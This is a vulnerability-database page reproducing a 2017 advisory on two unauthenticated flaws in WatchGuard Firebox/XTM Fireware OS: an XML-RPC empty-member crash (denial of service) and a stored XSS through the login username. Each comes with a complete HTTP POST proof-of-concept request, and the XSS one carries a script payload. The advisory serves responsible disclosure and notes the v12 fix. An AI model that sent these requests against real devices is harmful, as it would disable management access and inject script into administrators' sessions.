Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Watchguard Firebox / XTM XML-RPC Empty Member Denial Of Service

🗓️ 19 Sep 2017 00:00:00Reported by David FernandezType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 78 Views

Watchguard Firebox / XTM XML-RPC DoS vulnerabilitie

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2017-8056
30 Mar 202521:01
circl
CNVD		WatchGuard Fireware Denial of Service Vulnerability
24 Apr 201700:00
cnvd
CVE		CVE-2017-8056
22 Apr 201722:00
cve
Cvelist		CVE-2017-8056
22 Apr 201722:00
cvelist
NVD		CVE-2017-8056
22 Apr 201722:59
nvd
Prion		Xxe
22 Apr 201722:59
prion
RedhatCVE		CVE-2017-8056
22 May 202510:40
redhatcve
`Watchguardas Firebox and XTM are a series of enterprise grade network  
security appliances providing advanced security services like next  
generation firewall, intrusion prevention, malware detection and  
blockage and others. Two vulnerabilities were discovered affecting the  
XML-RPC interface of the Web UI used to manage Fireware OS, the  
operating system running on Watchguard Firebox and XTM appliances. To  
exploit any of the flaws discovered, no authentication on the Web UI  
is required.  
---------------------------------------------------------------------------  
XML-RPC Empty Member DoS  
  
Versions Affected  
Fireware OS versions below v12.0 were found to be vulnerable.  
  
CVE Reference  
Vendor assigned internal id FBX-5312 to vulnerability and will release  
a knowledge Base article following this advisory.  
  
Vendor Fix  
Vendor fixed the vulnerability in their v12 release.  
  
Credit  
David Fernandez of Sidertia Solutions  
  
Description  
If a login attempt is made in the XML-RPC interface with a XML message  
containing and empty member tag, the wgagent crashes logging out any  
user with a session opened in the UI. By continuously executing the  
failed logging attempts, the device will be impossible to be managed  
using the UI. It was not tested if this flaw causes similar lockout  
and degradation in connectivity like my previous CVE-2017-8056.  
  
Proof of concept  
Below is an example of the request that causes a crash in the XML-RPC wgagent:  
  
POST /agent/login HTTP/1.1  
Host: fireware-host:4100  
Connection: close  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Encoding: gzip, deflate, sdch, br  
Accept-Language: es,en;q=0.8,ca;q=0.6  
Cookie: sessionid=dasdasdas  
Content-Length: 207  
Content-Type: application/xml  
  
<methodCall><methodName>login</methodName><params><param><value><struct><member></member><member><name>user</name><value><string>admin</string></value></member></struct></value></param></params></methodCall>  
  
Links  
https://www.sidertia.com/Home/Community/Blog/2017/09/18/Fixed-Fireware-XXE-DOS-and-stored-XSS-vulnerabilities-discovered-by-Sidertia  
  
---------------------------------------------------------------------  
  
XML-RPC Username Stored Cross Site Scripting  
  
Versions Affected  
Fireware OS versions below v12.0 were found to be vulnerable.  
  
CVE Reference  
Vendor assigned internal id FBX-5313 to vulnerability and will release  
a knowledge Base article following this advisory.  
  
Vendor Fix  
Vendor fixed the vulnerability in their v12 release.  
  
Credit  
David Fernandez of Sidertia Solutions  
  
Description  
When a failed login attempt is made to the login endpoint of the  
XML-RPC interface, if javascript code, properly encoded to be consumed  
by XML parsers, is embedded as value of the user tag, the code will be  
rendered in the context of any logged in user in the Web UI visiting  
aTraffic Monitora sections aEventsa and aAlla. As a side effect, no  
further events will be visible in the Traffic Monitor until the device  
is restarted.  
  
Proof of concept  
POST /agent/login HTTP/1.1  
Host: fireware-host:4100  
Connection: close  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Encoding: gzip, deflate, sdch, br  
Accept-Language: es,en;q=0.8,ca;q=0.6  
Cookie: sessionid=dasdasdas  
Content-Length: 298  
Content-Type: application/xml  
  
<methodCall><methodName>login</methodName><params><param><value><struct><member></member><member><name>user</name><value><string>aa<img  
onerror=alert('xss')  
src=>a</string></value></member></struct></value></param></params></methodCall>  
  
Links  
https://www.sidertia.com/Home/Community/Blog/2017/09/18/Fixed-Fireware-XXE-DOS-and-stored-XSS-vulnerabilities-discovered-by-Sidertia  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Sep 2017 00:00Current
5.4Medium risk
Vulners AI Score5.4
EPSS0.11383
watchguardfireboxxtmxml-rpcdosvulnerabilitiesnetwork securityfirewallintrusion preventionexploitauthenticationuicrashsessionlogincvesidertia solutionsfixendpointjavascriptencodedxml parserstraffic monitor
78